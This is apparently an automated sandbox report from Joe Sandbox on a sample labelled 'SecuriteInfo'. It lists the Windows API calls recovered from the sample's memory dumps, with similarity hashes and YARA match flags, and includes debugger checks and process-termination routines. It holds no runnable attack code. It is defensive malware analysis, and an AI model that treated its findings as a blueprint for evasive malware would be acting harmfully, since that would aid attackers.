                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • GetACP.KERNEL32(?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00420F54
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?), ref: 00420F7F
                                                              • _wcschr.LIBVCRUNTIME ref: 00421013
                                                              • _wcschr.LIBVCRUNTIME ref: 00421021
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004210E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                              • String ID: utf8
                                                              • API String ID: 4147378913-905460609
                                                              • Opcode ID: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                              • Instruction ID: bacd77ab9f109c2ce2fb904c5d91b5ba267ea5c699df71e4fc18565647c60fab
                                                              • Opcode Fuzzy Hash: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                              • Instruction Fuzzy Hash: F4712831700321AAD734AB35EC86BBB73E8EF54704F55442BF505D7292EABCD8818668
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,02191BA4,00000002,00000000,?,?,?,02191BA4,?,00000000), ref: 0219191F
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,02191BA4,00000002,00000000,?,?,?,02191BA4,?,00000000), ref: 02191948
                                                              • GetACP.KERNEL32(?,?,02191BA4,?,00000000), ref: 0219195D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction ID: 614a4a995eda094a6c51d8d1597f065400fc289731c955d7c8396c26ab68169a
                                                              • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction Fuzzy Hash: B9216032B8010BBEEF349F54D941B9B73A6AF44A64B968474E90ED7114E732DAC2C350
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216B8
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216E1
                                                              • GetACP.KERNEL32(?,?,0042193D,?,00000000), ref: 004216F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction ID: 8acf744a58ce8a7ab2eb5bb327c39e73a43266cf4ebd95a2e37211785a4fc039
                                                              • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                              • Instruction Fuzzy Hash: ED219561700125A7D7348F54E901E9F73A6AF70B50FDE8466E806C7220E77ADD41C35C
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 02191B67
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 02191BB0
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 02191BBF
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 02191C07
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 02191C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 949163717-0
                                                              • Opcode ID: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                              • Instruction ID: 29f092ede0eb71273f950f196e423d9416f98789fed153cf7b15a2e4d96c0389
                                                              • Opcode Fuzzy Hash: 8a115925ad46f73fe3f85c246f00a00863f26e6dfe943abe63c1a752b08689ff
                                                              • Instruction Fuzzy Hash: 49517671A4020ABFDF24DFA9CC80ABE77BAEF44704F584469E919E7190E7709981CF61
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00421900
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00421949
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00421958
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004219A0
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004219BF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 949163717-0
                                                              • Opcode ID: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                              • Instruction ID: 516db4477a6e51dbe21ee2870d246937693e17751cc1d143beebadadd3fc4239
                                                              • Opcode Fuzzy Hash: 58ecbf3c41238f0300b8562ce6723dacb10c2e4b0d6c54bc6f80534ba04a49f5
                                                              • Instruction Fuzzy Hash: BC51A971B00229ABEF20EFA5DC81ABF73B8BF54704F94446AF500E7260D7749945C769
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .AB$.AB
                                                              • API String ID: 0-2297053732
                                                              • Opcode ID: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                              • Instruction ID: 9c6ffa21bb75b4405fc2a4b8468ed771a2dab9a861c59683d1b669e683ffb55f
                                                              • Opcode Fuzzy Hash: 34d1119f2ae738b9659adfb13489a30e3bb955bef0d933f4a1bcf5af706cb53a
                                                              • Instruction Fuzzy Hash: DAF13D71E00619DFDF14CFA9D9806EEB7B1FF88314F15826AD819AB344E734A941CB94
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0217DA28
                                                              • IsDebuggerPresent.KERNEL32 ref: 0217DAF4
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0217DB14
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0217DB1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction ID: ca1a4268828022b3b297444aab82f7db7d8d9f4918f29e5e6ecf305713cdf927
                                                              • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction Fuzzy Hash: 1631F875D4621CDBDB21DFA4DD89BCCBBB8BF48304F1041AAE40DAB290EB715A859F05
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040D7C1
                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D88D
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8AD
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0040D8B7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction ID: d4761c8bc1ea99229fdb17dfe79701451352590760d76ee157224913cadfbb7a
                                                              • Opcode Fuzzy Hash: 2768bc1d968ea917b1f97be8d9738c8842834bd5cce99c898dd5a0b2e51368ae
                                                              • Instruction Fuzzy Hash: 0E312F75D0521CDBDB20EFA5DD897CDBBB8BF08304F1040AAE40DA7290EB745A898F49
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02191561
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021915AB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02191671
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 3140898709-0
                                                              • Opcode ID: c5c1a4c01b29c0d3fe338de7955a3c3bd7360db9fe1c38947b5196717d1a821e
                                                              • Instruction ID: 81efe611d5dc530d73851392f57e738bae50e4b9348aa356da9a87cb74b96710
                                                              • Opcode Fuzzy Hash: c5c1a4c01b29c0d3fe338de7955a3c3bd7360db9fe1c38947b5196717d1a821e
                                                              • Instruction Fuzzy Hash: 8A619172A90107AFDF289F28CD82BBA77A9EF04704F144179E919C6584EB75D9C1CF90
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004212FA
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00421344
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042140A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 3140898709-0
                                                              • Opcode ID: 6acd00e9d4d0afc85601edb706b6c7d2d676f6c1e07a3845ab24e45734ca9780
                                                              • Instruction ID: c0bfd8cb71a0601470ff8ebcabc1dd41d73bf956737fdebdb9191936bb842b31
                                                              • Opcode Fuzzy Hash: 6acd00e9d4d0afc85601edb706b6c7d2d676f6c1e07a3845ab24e45734ca9780
                                                              • Instruction Fuzzy Hash: AE61A2716002279BEB24EF25DC82BBA73A9EF24304F54407BED05C6691E778D981CB58
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 021814DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 021814E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 021814F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                              • Instruction ID: 35f34d5b67cf3020019f2da38daf0befdfd8d7fffd34c9dfa440a698f7ec9b6e
                                                              • Opcode Fuzzy Hash: d251c0be41ef698f786db62af69caaf638685dfa11e06260af1d2b118d267355
                                                              • Instruction Fuzzy Hash: 8131D87594122CABCB21DF64DD89B9DBBF4BF48310F5041EAE41CA7290EB709B858F44
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00411273
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041127D
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041128A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                              • Instruction ID: 069db0b729b88edcbe1415199c877a2f5388b532d604f6458ec580dce293a37e
                                                              • Opcode Fuzzy Hash: 2c1a32ef1035b5dbf8a491830e48d39a1b8ac0405532fc47cee9a52cbebb52c5
                                                              • Instruction Fuzzy Hash: E331D674D012289BCB21DF65DC897DDBBB4BF08714F5041EAE50CA62A0E7349B858F49
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,02184EF5,00000000,004280A0,?,00000000,?,0218933A), ref: 02184F18
                                                              • TerminateProcess.KERNEL32(00000000,?,02184EF5,00000000,004280A0,?,00000000,?,0218933A), ref: 02184F1F
                                                              • ExitProcess.KERNEL32 ref: 02184F31
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction ID: c9a3f25b52eb6bc75d85df6a2d6c77e27b5efa697b35070df000a7c6c08a8b87
                                                              • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction Fuzzy Hash: EEE0B631185118AFCF217F68DC88A6D7B69EB44292B80442CF80586171CF35D993CE44
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                              • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                              • ExitProcess.KERNEL32 ref: 10005F60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                              • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                              • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                              • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: fc65ee4557ce3a06967f569c6f1e3da226a254f70847c988c3dfd9cad9991834
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: 783148B6950709DFDB10CF99C880AAEBBF9FF88324F15404AD845A7210D7B1EA45CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                              • Instruction ID: 41dbf83b6d38bf42d01598055f78bf91d19f7dfe74ffc9340570a5ec758d219a
                                                              • Opcode Fuzzy Hash: b390e4a2b809fc06d578254b51388bdd5f5ff6b6fff1ef8d4aef897508a94667
                                                              • Instruction Fuzzy Hash: 48F11D71E41219AFDF14DFA8C8C06ADFBB2EF48314F668269D915AB344D731A901CF90
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0218C4E5,?,?,?,?,?,?,00000000), ref: 0218C717
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction ID: bf09f6f8877a70d81981681e270736e2b636ea1d5f95e6ea3c57d1aed67af7cd
                                                              • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction Fuzzy Hash: BAB138712506098FDB18DF28C4C6A657BE1FF45368F25865AE89ACF2A1C335E981CF90
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041C27E,?,?,00000008,?,?,004251AB,00000000), ref: 0041C4B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction ID: 1e207280c519bced7d66c8b67978bc6121a932d59d727fe0a847cf8d2cc13a62
                                                              • Opcode Fuzzy Hash: 35b87f2179ce3c14b148e0892ddb5654e8e708f91f8d94a5ba77404dfe27ae65
                                                              • Instruction Fuzzy Hash: C2B14C31650608DFD714CF28C8C6BA67BA1FF45364F258659E89ACF3A1C339E992CB44
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                              • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                              • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                              • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040D9C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                              • Instruction ID: e83c888262e5176c2e399b2cb9a20f8e3507fb01a93416a2cee5b457c32b1697
                                                              • Opcode Fuzzy Hash: aa7d9029003f00ab9a07ca4a3ca600b7b925c7310fdfda5886337471c3949cde
                                                              • Instruction Fuzzy Hash: 5C515DB2E143098BDB28CF94D9857AABBF4FB48310F24857AD405EB391E3789944CF58
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 021890EC
                                                                • Part of subcall function 0218908A: _free.LIBCMT ref: 02189122
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021917B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2003897158-0
                                                              • Opcode ID: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                              • Instruction ID: a4cd9825cf9086a1db48a173adc0e7e0dd82e67eac053e64591d5d7335fdae68
                                                              • Opcode Fuzzy Hash: c057830d9f955838873051aea3cb367ccca586cb99bd1b8caf0ec7dac73f1eb9
                                                              • Instruction Fuzzy Hash: C121C272690207BFEF28AF25DC81ABA73A9FF44314B14407AED0AD6140EB35E980DF50
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418E85
                                                                • Part of subcall function 00418E23: _free.LIBCMT ref: 00418EBB
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042154D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free$InfoLocale
                                                              • String ID:
                                                              • API String ID: 2003897158-0
                                                              • Opcode ID: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                              • Instruction ID: 0a4d2d06c034290d104409f0a8c1658b3f82e5bad43bf4f1fbb2ccba27987c0f
